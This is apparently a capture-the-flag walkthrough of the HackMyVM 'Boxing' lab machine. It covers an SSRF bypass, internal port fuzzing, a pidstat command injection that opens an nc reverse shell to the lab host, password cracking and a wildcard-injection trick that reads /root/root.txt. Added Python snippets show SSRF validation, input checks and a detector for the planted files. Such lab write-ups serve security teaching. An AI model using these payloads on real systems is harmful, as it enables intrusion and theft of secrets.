Introduction
Target name: Boxing
Difficulty: Medium
Lab URL: https://hackmyvm.eu/machines/machine.php?vm=Boxing
Local environment
Hypervisor: VirtualBox
Target IP (Boxing): 192.168.56.107
Pivot host IP (Windows 10): 192.168.56.1 192.168.190.100
Attacker IP (Ubuntu 22.04): 192.168.190.30
Scanning
Using Zenmap:
nmap -p 1-65535 -T4 -A -v 192.168.56.107/32
Ports 22 and 80 are open.
HTTP
Domain name leak
Boxing, so it is a boxing-themed website.
Poking around a bit, I found that sending a request to /feedback.php
returns the domain staging-env.boxing.hmv in the response.
Directory brute-forcing
After adding the domain to the hosts file, and before re-running subdomain and path brute-forcing, try visiting this subdomain directly.
It is an "internal server check" page: after you enter a URL it renders the fetched page, minus its images.
Scanning paths turns up something new:
feroxbuster -u http://staging-env.boxing.hmv/ -t 20 -w $HVV_PATH/8_dict/Dictionary/directoryDicts/Filenames_or_Directories_All.txt -d 2
───────────────────────────┬──────────────────────
🎯 Target Url │ http://staging-env.boxing.hmv/
🚀 Threads │ 20
📖 Wordlist │ /root/Tool/HVV//8_dict/Dictionary/directoryDicts/Filenames_or_Directories_All.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.2
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 287c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 284c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 46l 91w 1167c http://staging-env.boxing.hmv/index.php
301 GET 9l 28w 332c http://staging-env.boxing.hmv/cache => http://staging-env.boxing.hmv/cache/
200 GET 1l 1w 178c http://staging-env.boxing.hmv/cache/707971e003b4ae6c8121c3a920e507f5-le64.cache-8
200 GET 46l 91w 1167c http://staging-env.boxing.hmv/
200 GET 174l 314w 5216c http://staging-env.boxing.hmv/cache/client_requests.har.swp
200 GET 4l 23w 190c http://staging-env.boxing.hmv/cache/CACHEDIR.TAG
200 GET 5l 27w 1884c http://staging-env.boxing.hmv/cache/data_block.bin
[####################] - 7s 45529/45529 0s found:7 errors:11858
[####################] - 6s 45523/45523 7534/s http://staging-env.boxing.hmv/
[####################] - 0s 45523/45523 373139/s http://staging-env.boxing.hmv/cache/ => Directory listing
Contents of CACHEDIR.TAG:
Signature: 8a477f597d28d172789f06886806bc55
# This file is a cache directory tag created by man-db.
# For information about cache directory tags, see:
# http://www.brynosaurus.com/cachedir/
So we now know man-db is in use.
Next is client_requests.har.swp, which is really the content of the feedback form; one entry is particularly interesting:
"postData": {
"mimeType": "application/x-www-form-urlencoded",
"text": "feedback=Hello%21+You+don%27t+have+a+link+to+reset+the+password%2C+and+I%27ve+forgotten+it%21+I+tried+Cassius%21+but+it+doesn%27t+work%3B+Contact+me+asap+pease%21%0D%0A%0D%0ACassius",
"params": [
{
"name": "feedback",
"value": "Hello%21+You+don%27t+have+a+link+to+reset+the+password%2C+and+I%27ve+forgotten+it%21+I+tried+Cassius%21+but+it+doesn%27t+work%3B+Contact+me+asap+pease%21%0D%0A%0D%0ACassius"
}
]
}
At least we now know there is a user named Cassius, and that the password Cassius! has been tried.
SSRF attack
With information gathering done, back to the original page.
Reference: https://websec.readthedocs.io/zh/latest/vuln/ssrf.html
After some testing, it turns out that prefixing the input with boxing.hmv@ is all it takes to fetch and render an arbitrary page.
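An added defensive check, written for this post rather than taken from the Boxing application: it assumes the page prepends http:// to the url parameter, parses the result with urllib, and shows why a prefix test passes boxing.hmv@127.0.0.1:5000 while a check on the parsed hostname rejects it.

```python
import ipaddress
from urllib.parse import urlsplit

# Hosts the "internal server check" is meant to fetch (assumed allowlist).
ALLOWED_HOSTS = {"boxing.hmv", "staging-env.boxing.hmv"}

def naive_check(raw: str) -> bool:
    """A prefix test: this is exactly what the user@host trick walks past."""
    return raw.startswith("boxing.hmv")

def effective_target(raw: str) -> tuple[str, int]:
    """Host and port an HTTP client actually connects to for this input.
    Assumption: the page prepends http:// when no scheme is given."""
    url = raw if "://" in raw else "http://" + raw
    parts = urlsplit(url)
    # .hostname drops any user@ part, so boxing.hmv@127.0.0.1 -> 127.0.0.1
    return parts.hostname or "", parts.port or 80

def is_internal(host: str) -> bool:
    """True for literal addresses the proxy should never be allowed to reach."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False          # a hostname, not a literal address
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved

def classify(raw: str) -> str:
    """Decide on the parsed target, never on the raw string."""
    host, port = effective_target(raw)
    if is_internal(host):
        return "blocked: internal address"
    if host not in ALLOWED_HOSTS:
        return "blocked: host not allowlisted"
    if port not in (80, 443):
        return "blocked: unexpected port"
    return "allowed"
```

Because an allowlisted name could itself resolve to a loopback or private address, a complete fix also resolves the host and applies is_internal to every resulting address before connecting.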
I wrote a PHP reverse shell, served it over HTTP and had the page fetch it... which does not work. No shell ever came back.
So start again from this SSRF and scan the target from the inside, this time not with nmap but by fuzzing the port number in the URL:
ffuf -u http://staging-env.boxing.hmv/index.php\?url=boxing.hmv@127.0.0.1:FUZZ -w ./pass -c -H "User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100" -t 50 -fw 395
________________________________________________
:: Method : GET
:: URL : http://staging-env.boxing.hmv/index.php?url=boxing.hmv@127.0.0.1:FUZZ
:: Wordlist : FUZZ: /root/problem/HVV/boxing/pass
:: Header : User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 395
________________________________________________
0 [Status: 200, Size: 25021, Words: 10556, Lines: 702, Duration: 30ms]
80 [Status: 200, Size: 25021, Words: 10556, Lines: 702, Duration: 17ms]
5000 [Status: 200, Size: 2367, Words: 828, Lines: 96, Duration: 4ms]
:: Progress: [65535/65535] :: Job [1/1] :: 1269 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
Port 5000 is exposed; let's take a look.
Clicking submit sends a field called processName, whose purpose is unclear, via POST, and nothing is echoed back.
Because the page is reached through the SSRF, the POST parameter has to be turned into a GET parameter:
http://staging-env.boxing.hmv/index.php/?url=boxing.hmv@127.0.0.1:5000?processName=id
Well, id does not get executed, but pidstat shows up in the output. That command is normally used to report user- and system-mode CPU usage, but with the -e argument it executes a command.
So we have command injection.
Construct the URL:
http://staging-env.boxing.hmv/index.php/?url=boxing.hmv@127.0.0.1:5000?processName=pidstat%2B-e%2Bnc%2b-e%2b/bin/sh%2b192.168.56.1%2b40001
A shell comes back.
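An added example of how the port-5000 service could have handled processName safely; this is not the Boxing service's code, and it assumes the service only needs to look a process up by name (pidof is an assumed stand-in for whatever it runs). It also decodes the writeup's payload one hop at a time to show why a strict name pattern rejects it at either stage.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Process names: letters, digits, dot, underscore, dash; no spaces or shell metacharacters.
NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Payload from the writeup (constructed copy of the processName value).
PAGE_PAYLOAD = "pidstat%2B-e%2Bnc%2b-e%2b/bin/sh%2b192.168.56.1%2b40001"

class InvalidProcessName(ValueError):
    pass

def decode_hop(value: str) -> str:
    """One layer of form decoding, as each server on the SSRF path applies it."""
    return unquote_plus(value)

def validate_process_name(name: str) -> str:
    """Accept the framework-decoded value only if it is a bare process name."""
    if not NAME_RE.fullmatch(name):
        raise InvalidProcessName(f"rejected processName: {name!r}")
    return name

def is_accepted(name: str) -> bool:
    try:
        validate_process_name(name)
    except InvalidProcessName:
        return False
    return True

def build_argv(name: str) -> list[str]:
    # The program is fixed by the server; user input only ever becomes one argument.
    return ["pidof", validate_process_name(name)]

def is_running(name: str) -> bool:
    # argv list and no shell: nothing in the argument is re-parsed as a command.
    result = subprocess.run(build_argv(name), capture_output=True, text=True)
    return result.returncode == 0
```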
Privilege escalation
Targeted brute force
The hash of user cassius was found in the website's database.
Why "targeted"? Mainly because none of the wordlists I had could crack the hash... but combined with the previously leaked Cassius!, we know the password is related to that string.
I used the password generator from 雨苁 at https://www.ddosi.org/pass8/
john --wordlist=passwd.txt ./pass
The password is Cassius!123.
root
linpeas found SUID binaries.
incrontab looked like it had something going on, but I did not know how to exploit it until I saw the scripts in /opt.
Wenxin (Baidu's ERNIE Bot) described it as roughly a log-like mechanism.
The content of sos.sh is as follows:
#!/bin/bash
logs="/opt/sos/logs/output-logs.txt"
rm $logs
exec &>$logs
cd /home/cassius
file *
ss -altupn
last -a
w
ps aux
top -n 1
lsof
for user in $(cut -f1 -d: /etc/passwd); do
echo "Cron jobs for $user:"
crontab -u $user -l
done
tail /var/log/syslog
sha256sum /bin/* /sbin/* /usr/bin/* /usr/sbin/*
chmod 700 $logs
Look at the file * command: the * wildcard does nothing more than expand to the matching file names, and that expansion happens before the command runs. So if a file named -f exists, what actually runs is file -f followed by the remaining names, and file -f reads the list of files to examine from the named file.
So in addition to creating -f, we also need a symlink to /root/root.txt, so that file treats its contents as file names and echoes them back in the output:
cassius@boxing:~$ ls -l
total 4
-rw-r--r-- 1 cassius cassius 0 Apr 14 17:23 -f
lrwxrwxrwx 1 cassius cassius 14 Apr 14 17:21 root -> /root/root.txt
-rwx------ 1 cassius cassius 33 Feb 4 03:15 user.txt
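The script-side fix is to write file ./* (or file -- *) so that no expanded name can become an option. As an added detection example that is not part of the writeup, the audit below flags the two artifacts this attack leaves in a home directory: names that begin with a dash and symlinks pointing into /root; the demo reproduces the listing above in a constructed temporary directory.

```python
import os
import tempfile
from pathlib import Path

# Paths a user's own files should never point a privileged cron job at (assumed list).
SENSITIVE_PREFIXES = ("/root", "/etc/shadow")

def audit_dir(path: str) -> list[tuple[str, str]]:
    """Return (entry, reason) pairs for names a glob would turn into options
    and for symlinks that redirect a root-run command at sensitive files."""
    findings = []
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if entry.startswith("-"):
            findings.append((entry, "name expands to a command-line option"))
        if os.path.islink(full):
            # Resolve relative link targets against the directory; keep absolute ones.
            target = os.path.normpath(os.path.join(path, os.readlink(full)))
            if target.startswith(SENSITIVE_PREFIXES):
                findings.append((entry, f"symlink to {target}"))
    return findings

def demo() -> list[tuple[str, str]]:
    """Constructed home directory matching the ls -l output in the writeup."""
    with tempfile.TemporaryDirectory() as home:
        Path(home, "-f").touch()
        os.symlink("/root/root.txt", os.path.join(home, "root"))
        Path(home, "user.txt").write_text("placeholder\n")
        return audit_dir(home)
```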
Worth noting: sos writes its output to /opt/sos/logs/output-logs.txt, and that file is readable by us right up until chmod 700 $logs runs. So we need a small loop that keeps reading the log contents:
while :;do cat /opt/sos/logs/output-logs.txt 2>/dev/null;done
Finally, trigger the script:
chmod 700 ./user.txt
And we get the flag:
19ed17ba1da85521ce659aeeb5ecd751